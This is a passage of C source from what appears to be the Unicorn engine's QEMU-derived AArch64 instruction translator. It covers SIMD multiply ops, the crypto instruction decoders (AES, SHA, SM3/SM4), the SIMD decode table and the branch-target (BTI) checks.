tcg_op, tcg_idx, fpst); break; default: g_assert_not_reached(); } break; case 0x19: /* FMULX */ switch (size) { case 1: if (is_scalar) { gen_helper_advsimd_mulxh(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); } else { gen_helper_advsimd_mulx2h(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); } break; case 2: gen_helper_vfp_mulxs(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); break; default: g_assert_not_reached(); } break; case 0x0c: /* SQDMULH */ if (size == 1) { gen_helper_neon_qdmulh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx); } else { gen_helper_neon_qdmulh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx); } break; case 0x0d: /* SQRDMULH */ if (size == 1) { gen_helper_neon_qrdmulh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx); } else { gen_helper_neon_qrdmulh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx); } break; case 0x1d: /* SQRDMLAH */ read_vec_element_i32(s, tcg_res, rd, pass, is_scalar ? size : MO_32); if (size == 1) { gen_helper_neon_qrdmlah_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx, tcg_res); } else { gen_helper_neon_qrdmlah_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx, tcg_res); } break; case 0x1f: /* SQRDMLSH */ read_vec_element_i32(s, tcg_res, rd, pass, is_scalar ? size : MO_32); if (size == 1) { gen_helper_neon_qrdmlsh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx, tcg_res); } else { gen_helper_neon_qrdmlsh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx, tcg_res); } break; default: g_assert_not_reached(); } if (is_scalar) { write_fp_sreg(s, rd, tcg_res); } else { write_vec_element_i32(s, tcg_res, rd, pass, MO_32); } tcg_temp_free_i32(tcg_ctx, tcg_op); tcg_temp_free_i32(tcg_ctx, tcg_res); } tcg_temp_free_i32(tcg_ctx, tcg_idx); clear_vec_high(s, is_q, rd); } else { /* long ops: 16x16->32 or 32x32->64 */ TCGv_i64 tcg_res[2]; int pass; bool satop = extract32(opcode, 0, 1); MemOp memop = MO_32; if (satop || !u) { memop |= MO_SIGN; } if (size == 2) { TCGv_i64 tcg_idx = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_idx, rm, index, memop); for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_passres; int passelt; if (is_scalar) { passelt = 0; } else { passelt = pass + (is_q * 2); } read_vec_element(s, tcg_op, rn, passelt, memop); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); if (opcode == 0xa || opcode == 0xb) { /* Non-accumulating ops */ tcg_passres = tcg_res[pass]; } else { tcg_passres = tcg_temp_new_i64(tcg_ctx); } tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op, tcg_idx); tcg_temp_free_i64(tcg_ctx, tcg_op); if (satop) { /* saturating, doubling */ gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, tcg_passres, tcg_passres); } if (opcode == 0xa || opcode == 0xb) { continue; } /* Accumulating op: handle accumulate step */ read_vec_element(s, tcg_res[pass], rd, pass, MO_64); switch (opcode) { case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); break; case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ tcg_gen_sub_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); break; case 0x7: /* SQDMLSL, SQDMLSL2 */ tcg_gen_neg_i64(tcg_ctx, tcg_passres, tcg_passres); /* fall through */ case 0x3: /* SQDMLAL, SQDMLAL2 */ gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_res[pass], tcg_passres); break; default: g_assert_not_reached(); } tcg_temp_free_i64(tcg_ctx, tcg_passres); } tcg_temp_free_i64(tcg_ctx, tcg_idx); clear_vec_high(s, !is_scalar, rd); } else { TCGv_i32 tcg_idx = tcg_temp_new_i32(tcg_ctx); assert(size == 1); read_vec_element_i32(s, tcg_idx, rm, index, size); if (!is_scalar) { /* The simplest way to handle the 16x16 indexed ops is to * duplicate the index into both halves of the 32 bit tcg_idx * and then use the usual Neon helpers. */ tcg_gen_deposit_i32(tcg_ctx, tcg_idx, tcg_idx, tcg_idx, 16, 16); } for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i64 tcg_passres; if (is_scalar) { read_vec_element_i32(s, tcg_op, rn, pass, size); } else { read_vec_element_i32(s, tcg_op, rn, pass + (is_q * 2), MO_32); } tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); if (opcode == 0xa || opcode == 0xb) { /* Non-accumulating ops */ tcg_passres = tcg_res[pass]; } else { tcg_passres = tcg_temp_new_i64(tcg_ctx); } if (memop & MO_SIGN) { gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op, tcg_idx); } else { gen_helper_neon_mull_u16(tcg_ctx, tcg_passres, tcg_op, tcg_idx); } if (satop) { gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, tcg_passres, tcg_passres); } tcg_temp_free_i32(tcg_ctx, tcg_op); if (opcode == 0xa || opcode == 0xb) { continue; } /* Accumulating op: handle accumulate step */ read_vec_element(s, tcg_res[pass], rd, pass, MO_64); switch (opcode) { case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ gen_helper_neon_addl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); break; case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ gen_helper_neon_subl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); break; case 0x7: /* SQDMLSL, SQDMLSL2 */ gen_helper_neon_negl_u32(tcg_ctx, tcg_passres, tcg_passres); /* fall through */ case 0x3: /* SQDMLAL, SQDMLAL2 */ gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_res[pass], tcg_passres); break; default: g_assert_not_reached(); } tcg_temp_free_i64(tcg_ctx, tcg_passres); } tcg_temp_free_i32(tcg_ctx, tcg_idx); if (is_scalar) { tcg_gen_ext32u_i64(tcg_ctx, tcg_res[0], tcg_res[0]); } } if (is_scalar) { tcg_res[1] = tcg_const_i64(tcg_ctx, 0); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } if (fpst) { tcg_temp_free_ptr(tcg_ctx, fpst); } } /* Crypto AES * 31 24 23 22 21 17 16 12 11 10 9 5 4 0 * +-----------------+------+-----------+--------+-----+------+------+ * | 0 1 0 0 1 1 1 0 | size | 1 0 1 0 0 | opcode | 1 0 | Rn | Rd | * +-----------------+------+-----------+--------+-----+------+------+ */ static void disas_crypto_aes(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int decrypt; TCGv_ptr tcg_rd_ptr, tcg_rn_ptr; TCGv_i32 tcg_decrypt; CryptoThreeOpIntFn *genfn; if (!dc_isar_feature(aa64_aes, s) || size != 0) { unallocated_encoding(s); return; } switch (opcode) { case 0x4: /* AESE */ decrypt = 0; genfn = gen_helper_crypto_aese; break; case 0x6: /* AESMC */ decrypt = 0; genfn = gen_helper_crypto_aesmc; break; case 0x5: /* AESD */ decrypt = 1; genfn = gen_helper_crypto_aese; break; case 0x7: /* AESIMC */ decrypt = 1; genfn = gen_helper_crypto_aesmc; break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); tcg_decrypt = tcg_const_i32(tcg_ctx, decrypt); genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_decrypt); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); tcg_temp_free_i32(tcg_ctx, tcg_decrypt); } /* Crypto three-reg SHA * 31 24 23 22 21 20 16 15 14 12 11 10 9 5 4 0 * +-----------------+------+---+------+---+--------+-----+------+------+ * | 0 1 0 1 1 1 1 0 | size | 0 | Rm | 0 | opcode | 0 0 | Rn | Rd | * +-----------------+------+---+------+---+--------+-----+------+------+ */ static void disas_crypto_three_reg_sha(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 3); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); CryptoThreeOpFn *genfn; TCGv_ptr tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr; bool feature; if (size != 0) { unallocated_encoding(s); return; } switch (opcode) { case 0: /* SHA1C */ case 1: /* SHA1P */ case 2: /* SHA1M */ case 3: /* SHA1SU0 */ genfn = NULL; feature = dc_isar_feature(aa64_sha1, s); break; case 4: /* SHA256H */ genfn = gen_helper_crypto_sha256h; feature = dc_isar_feature(aa64_sha256, s); break; case 5: /* SHA256H2 */ genfn = gen_helper_crypto_sha256h2; feature = dc_isar_feature(aa64_sha256, s); break; case 6: /* SHA256SU1 */ genfn = gen_helper_crypto_sha256su1; feature = dc_isar_feature(aa64_sha256, s); break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); tcg_rm_ptr = vec_full_reg_ptr(s, rm); if (genfn) { genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr); } else { TCGv_i32 tcg_opcode = tcg_const_i32(tcg_ctx, opcode); gen_helper_crypto_sha1_3reg(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr, tcg_opcode); tcg_temp_free_i32(tcg_ctx, tcg_opcode); } tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rm_ptr); } /* Crypto two-reg SHA * 31 24 23 22 21 17 16 12 11 10 9 5 4 0 * +-----------------+------+-----------+--------+-----+------+------+ * | 0 1 0 1 1 1 1 0 | size | 1 0 1 0 0 | opcode | 1 0 | Rn | Rd | * +-----------------+------+-----------+--------+-----+------+------+ */ static void disas_crypto_two_reg_sha(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); CryptoTwoOpFn *genfn; bool feature; TCGv_ptr tcg_rd_ptr, tcg_rn_ptr; if (size != 0) { unallocated_encoding(s); return; } switch (opcode) { case 0: /* SHA1H */ feature = dc_isar_feature(aa64_sha1, s); genfn = gen_helper_crypto_sha1h; break; case 1: /* SHA1SU1 */ feature = dc_isar_feature(aa64_sha1, s); genfn = gen_helper_crypto_sha1su1; break; case 2: /* SHA256SU0 */ feature = dc_isar_feature(aa64_sha256, s); genfn = gen_helper_crypto_sha256su0; break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); } /* Crypto three-reg SHA512 * 31 21 20 16 15 14 13 12 11 10 9 5 4 0 * +-----------------------+------+---+---+-----+--------+------+------+ * | 1 1 0 0 1 1 1 0 0 1 1 | Rm | 1 | O | 0 0 | opcode | Rn | Rd | * +-----------------------+------+---+---+-----+--------+------+------+ */ static void disas_crypto_three_reg_sha512(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opcode = extract32(insn, 10, 2); int o = extract32(insn, 14, 1); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); bool feature; CryptoThreeOpFn *genfn; if (o == 0) { switch (opcode) { case 0: /* SHA512H */ feature = dc_isar_feature(aa64_sha512, s); genfn = gen_helper_crypto_sha512h; break; case 1: /* SHA512H2 */ feature = dc_isar_feature(aa64_sha512, s); genfn = gen_helper_crypto_sha512h2; break; case 2: /* SHA512SU1 */ feature = dc_isar_feature(aa64_sha512, s); genfn = gen_helper_crypto_sha512su1; break; case 3: /* RAX1 */ feature = dc_isar_feature(aa64_sha3, s); genfn = NULL; break; default: g_assert_not_reached(); } } else { switch (opcode) { case 0: /* SM3PARTW1 */ feature = dc_isar_feature(aa64_sm3, s); genfn = gen_helper_crypto_sm3partw1; break; case 1: /* SM3PARTW2 */ feature = dc_isar_feature(aa64_sm3, s); genfn = gen_helper_crypto_sm3partw2; break; case 2: /* SM4EKEY */ feature = dc_isar_feature(aa64_sm4, s); genfn = gen_helper_crypto_sm4ekey; break; default: unallocated_encoding(s); return; } } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (genfn) { TCGv_ptr tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr; tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); tcg_rm_ptr = vec_full_reg_ptr(s, rm); genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rm_ptr); } else { TCGv_i64 tcg_op1, tcg_op2, tcg_res[2]; int pass; tcg_op1 = tcg_temp_new_i64(tcg_ctx); tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_res[0] = tcg_temp_new_i64(tcg_ctx); tcg_res[1] = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass < 2; pass++) { read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); tcg_gen_rotli_i64(tcg_ctx, tcg_res[pass], tcg_op2, 1); tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); } write_vec_element(s, tcg_res[0], rd, 0, MO_64); write_vec_element(s, tcg_res[1], rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res[0]); tcg_temp_free_i64(tcg_ctx, tcg_res[1]); } } /* Crypto two-reg SHA512 * 31 12 11 10 9 5 4 0 * +-----------------------------------------+--------+------+------+ * | 1 1 0 0 1 1 1 0 1 1 0 0 0 0 0 0 1 0 0 0 | opcode | Rn | Rd | * +-----------------------------------------+--------+------+------+ */ static void disas_crypto_two_reg_sha512(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opcode = extract32(insn, 10, 2); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); TCGv_ptr tcg_rd_ptr, tcg_rn_ptr; bool feature; CryptoTwoOpFn *genfn; switch (opcode) { case 0: /* SHA512SU0 */ feature = dc_isar_feature(aa64_sha512, s); genfn = gen_helper_crypto_sha512su0; break; case 1: /* SM4E */ feature = dc_isar_feature(aa64_sm4, s); genfn = gen_helper_crypto_sm4e; break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); } /* Crypto four-register * 31 23 22 21 20 16 15 14 10 9 5 4 0 * +-------------------+-----+------+---+------+------+------+ * | 1 1 0 0 1 1 1 0 0 | Op0 | Rm | 0 | Ra | Rn | Rd | * +-------------------+-----+------+---+------+------+------+ */ static void disas_crypto_four_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op0 = extract32(insn, 21, 2); int rm = extract32(insn, 16, 5); int ra = extract32(insn, 10, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); bool feature; switch (op0) { case 0: /* EOR3 */ case 1: /* BCAX */ feature = dc_isar_feature(aa64_sha3, s); break; case 2: /* SM3SS1 */ feature = dc_isar_feature(aa64_sm3, s); break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (op0 < 2) { TCGv_i64 tcg_op1, tcg_op2, tcg_op3, tcg_res[2]; int pass; tcg_op1 = tcg_temp_new_i64(tcg_ctx); tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_op3 = tcg_temp_new_i64(tcg_ctx); tcg_res[0] = tcg_temp_new_i64(tcg_ctx); tcg_res[1] = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass < 2; pass++) { read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); read_vec_element(s, tcg_op3, ra, pass, MO_64); if (op0 == 0) { /* EOR3 */ tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_op2, tcg_op3); } else { /* BCAX */ tcg_gen_andc_i64(tcg_ctx, tcg_res[pass], tcg_op2, tcg_op3); } tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); } write_vec_element(s, tcg_res[0], rd, 0, MO_64); write_vec_element(s, tcg_res[1], rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_op3); tcg_temp_free_i64(tcg_ctx, tcg_res[0]); tcg_temp_free_i64(tcg_ctx, tcg_res[1]); } else { TCGv_i32 tcg_op1, tcg_op2, tcg_op3, tcg_res, tcg_zero; tcg_op1 = tcg_temp_new_i32(tcg_ctx); tcg_op2 = tcg_temp_new_i32(tcg_ctx); tcg_op3 = tcg_temp_new_i32(tcg_ctx); tcg_res = tcg_temp_new_i32(tcg_ctx); tcg_zero = tcg_const_i32(tcg_ctx, 0); read_vec_element_i32(s, tcg_op1, rn, 3, MO_32); read_vec_element_i32(s, tcg_op2, rm, 3, MO_32); read_vec_element_i32(s, tcg_op3, ra, 3, MO_32); tcg_gen_rotri_i32(tcg_ctx, tcg_res, tcg_op1, 20); tcg_gen_add_i32(tcg_ctx, tcg_res, tcg_res, tcg_op2); tcg_gen_add_i32(tcg_ctx, tcg_res, tcg_res, tcg_op3); tcg_gen_rotri_i32(tcg_ctx, tcg_res, tcg_res, 25); write_vec_element_i32(s, tcg_zero, rd, 0, MO_32); write_vec_element_i32(s, tcg_zero, rd, 1, MO_32); write_vec_element_i32(s, tcg_zero, rd, 2, MO_32); write_vec_element_i32(s, tcg_res, rd, 3, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_op3); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_zero); } } /* Crypto XAR * 31 21 20 16 15 10 9 5 4 0 * +-----------------------+------+--------+------+------+ * | 1 1 0 0 1 1 1 0 1 0 0 | Rm | imm6 | Rn | Rd | * +-----------------------+------+--------+------+------+ */ static void disas_crypto_xar(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rm = extract32(insn, 16, 5); int imm6 = extract32(insn, 10, 6); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); TCGv_i64 tcg_op1, tcg_op2, tcg_res[2]; int pass; if (!dc_isar_feature(aa64_sha3, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_op1 = tcg_temp_new_i64(tcg_ctx); tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_res[0] = tcg_temp_new_i64(tcg_ctx); tcg_res[1] = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass < 2; pass++) { read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); tcg_gen_rotri_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], imm6); } write_vec_element(s, tcg_res[0], rd, 0, MO_64); write_vec_element(s, tcg_res[1], rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res[0]); tcg_temp_free_i64(tcg_ctx, tcg_res[1]); } /* Crypto three-reg imm2 * 31 21 20 16 15 14 13 12 11 10 9 5 4 0 * +-----------------------+------+-----+------+--------+------+------+ * | 1 1 0 0 1 1 1 0 0 1 0 | Rm | 1 0 | imm2 | opcode | Rn | Rd | * +-----------------------+------+-----+------+--------+------+------+ */ static void disas_crypto_three_reg_imm2(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opcode = extract32(insn, 10, 2); int imm2 = extract32(insn, 12, 2); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); TCGv_ptr tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr; TCGv_i32 tcg_imm2, tcg_opcode; if (!dc_isar_feature(aa64_sm3, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); tcg_rm_ptr = vec_full_reg_ptr(s, rm); tcg_imm2 = tcg_const_i32(tcg_ctx, imm2); tcg_opcode = tcg_const_i32(tcg_ctx, opcode); gen_helper_crypto_sm3tt(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr, tcg_imm2, tcg_opcode); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rm_ptr); tcg_temp_free_i32(tcg_ctx, tcg_imm2); tcg_temp_free_i32(tcg_ctx, tcg_opcode); } /* C3.6 Data processing - SIMD, inc Crypto * * As the decode gets a little complex we are using a table based * approach for this part of the decode. */ static const AArch64DecodeTable data_proc_simd[] = { /* pattern , mask , fn */ { 0x0e200400, 0x9f200400, disas_simd_three_reg_same }, { 0x0e008400, 0x9f208400, disas_simd_three_reg_same_extra }, { 0x0e200000, 0x9f200c00, disas_simd_three_reg_diff }, { 0x0e200800, 0x9f3e0c00, disas_simd_two_reg_misc }, { 0x0e300800, 0x9f3e0c00, disas_simd_across_lanes }, { 0x0e000400, 0x9fe08400, disas_simd_copy }, { 0x0f000000, 0x9f000400, disas_simd_indexed }, /* vector indexed */ /* simd_mod_imm decode is a subset of simd_shift_imm, so must precede it */ { 0x0f000400, 0x9ff80400, disas_simd_mod_imm }, { 0x0f000400, 0x9f800400, disas_simd_shift_imm }, { 0x0e000000, 0xbf208c00, disas_simd_tb }, { 0x0e000800, 0xbf208c00, disas_simd_zip_trn }, { 0x2e000000, 0xbf208400, disas_simd_ext }, { 0x5e200400, 0xdf200400, disas_simd_scalar_three_reg_same }, { 0x5e008400, 0xdf208400, disas_simd_scalar_three_reg_same_extra }, { 0x5e200000, 0xdf200c00, disas_simd_scalar_three_reg_diff }, { 0x5e200800, 0xdf3e0c00, disas_simd_scalar_two_reg_misc }, { 0x5e300800, 0xdf3e0c00, disas_simd_scalar_pairwise }, { 0x5e000400, 0xdfe08400, disas_simd_scalar_copy }, { 0x5f000000, 0xdf000400, disas_simd_indexed }, /* scalar indexed */ { 0x5f000400, 0xdf800400, disas_simd_scalar_shift_imm }, { 0x4e280800, 0xff3e0c00, disas_crypto_aes }, { 0x5e000000, 0xff208c00, disas_crypto_three_reg_sha }, { 0x5e280800, 0xff3e0c00, disas_crypto_two_reg_sha }, { 0xce608000, 0xffe0b000, disas_crypto_three_reg_sha512 }, { 0xcec08000, 0xfffff000, disas_crypto_two_reg_sha512 }, { 0xce000000, 0xff808000, disas_crypto_four_reg }, { 0xce800000, 0xffe00000, disas_crypto_xar }, { 0xce408000, 0xffe0c000, disas_crypto_three_reg_imm2 }, { 0x0e400400, 0x9f60c400, disas_simd_three_reg_same_fp16 }, { 0x0e780800, 0x8f7e0c00, disas_simd_two_reg_misc_fp16 }, { 0x5e400400, 0xdf60c400, disas_simd_scalar_three_reg_same_fp16 }, { 0x00000000, 0x00000000, NULL } }; static void disas_data_proc_simd(DisasContext *s, uint32_t insn) { /* Note that this is called with all non-FP cases from * table C3-6 so it must UNDEF for entries not specifically * allocated to instructions in that table. */ AArch64DecodeFn *fn = lookup_disas_fn(&data_proc_simd[0], insn); if (fn) { fn(s, insn); } else { unallocated_encoding(s); } } /* C3.6 Data processing - SIMD and floating point */ static void disas_data_proc_simd_fp(DisasContext *s, uint32_t insn) { if (extract32(insn, 28, 1) == 1 && extract32(insn, 30, 1) == 0) { disas_data_proc_fp(s, insn); } else { /* SIMD, including crypto */ disas_data_proc_simd(s, insn); } } /** * is_guarded_page: * @env: The cpu environment * @s: The DisasContext * * Return true if the page is guarded. */ static bool is_guarded_page(CPUARMState *env, DisasContext *s) { uint64_t addr = s->base.pc_first; int mmu_idx = arm_to_core_mmu_idx(s->mmu_idx); unsigned int index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); /* * We test this immediately after reading an insn, which means * that any normal page must be in the TLB. The only exception * would be for executing from flash or device memory, which * does not retain the TLB entry. * * FIXME: Assume false for those, for now. We could use * arm_cpu_get_phys_page_attrs_debug to re-read the page * table entry even for that case. */ return (tlb_hit(s->uc, entry->addr_code, addr) && env_tlb(env)->d[mmu_idx].iotlb[index].attrs.target_tlb_bit0); } /** * btype_destination_ok: * @insn: The instruction at the branch destination * @bt: SCTLR_ELx.BT * @btype: PSTATE.BTYPE, and is non-zero * * On a guarded page, there are a limited number of insns * that may be present at the branch target: * - branch target identifiers, * - paciasp, pacibsp, * - BRK insn * - HLT insn * Anything else causes a Branch Target Exception. * * Return true if the branch is compatible, false to raise BTITRAP. */ static bool btype_destination_ok(uint32_t insn, bool bt, int btype) { if ((insn & 0xfffff01fu) == 0xd503201fu) { /* HINT space */ switch (extract32(insn, 5, 7)) { case 0x19: // 0b011001: /* PACIASP */ case 0x1b: // 0b011011: /* PACIBSP */ /* * If SCTLR_ELx.BT, then PACI*SP are not compatible * with btype == 3. Otherwise all btype are ok. */ return !bt || btype != 3; case 0x20: // 0b100000: /* BTI */ /* Not compatible with any btype. */ return false; case 0x22: // 0b100010: /* BTI c */ /* Not compatible with btype == 3 */ return btype != 3; case 0x24: // 0b100100: /* BTI j */ /* Not compatible with btype == 2 */ return btype != 2; case 0x26: // 0b100110: /* BTI jc */ /* Compatible with any btype. */ return true; } } else { switch (insn & 0xffe0001fu) { case 0xd4200000u: /* BRK */ case 0xd4400000u: /* HLT */ /* Give priority to the breakpoint exception. */ return true; } } return false; } /* C3.1 A64 instruction index by encoding */ static void disas_a64_insn(CPUARMState *env, DisasContext *s) { uint32_t insn; s->pc_curr = s->base.pc_next; insn = arm_ldl_code(env, s->base.pc_next, s->sctlr_b); s->insn = insn; s->base.pc_next += 4; // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, s->pc_curr)) { // Sync PC in advance TCGContext *tcg_ctx = env->uc->tcg_ctx; gen_a64_set_pc_im(tcg_ctx, s->pc_curr); gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, env->uc, s->pc_curr); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } s->fp_access_checked = false; if (dc_isar_feature(aa64_bti, s)) { if (s->base.num_insns == 1) { /* * At the first insn of the TB, compute s->guarded_page. * We delayed computing this until successfully reading * the first insn of the TB, above. This (mostly) ensures * that the softmmu tlb entry has been populated, and the * page table GP bit is available. * * Note that we need to compute this even if btype == 0, * because this value is used for BR instructions later * where ENV is not available. */ s->guarded_page = is_guarded_page(env, s); /* First insn can have btype set to non-zero. */ tcg_debug_assert(s->btype >= 0); /* * Note that the Branch Target Exception has fairly high * priority -- below debugging exceptions but above most * everything else. This allows us to handle this now * instead of waiting until the insn is otherwise decoded. */ if (s->btype != 0 && s->guarded_page && !btype_destination_ok(insn, s->bt, s->btype)) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_btitrap(s->btype), default_exception_el(s)); return; } } else { /* Not the first insn: btype must be 0. */ tcg_debug_assert(s->btype == 0); } } switch (extract32(insn, 25, 4)) { case 0x0: case 0x1: case 0x3: /* UNALLOCATED */ unallocated_encoding(s); break; case 0x2: if 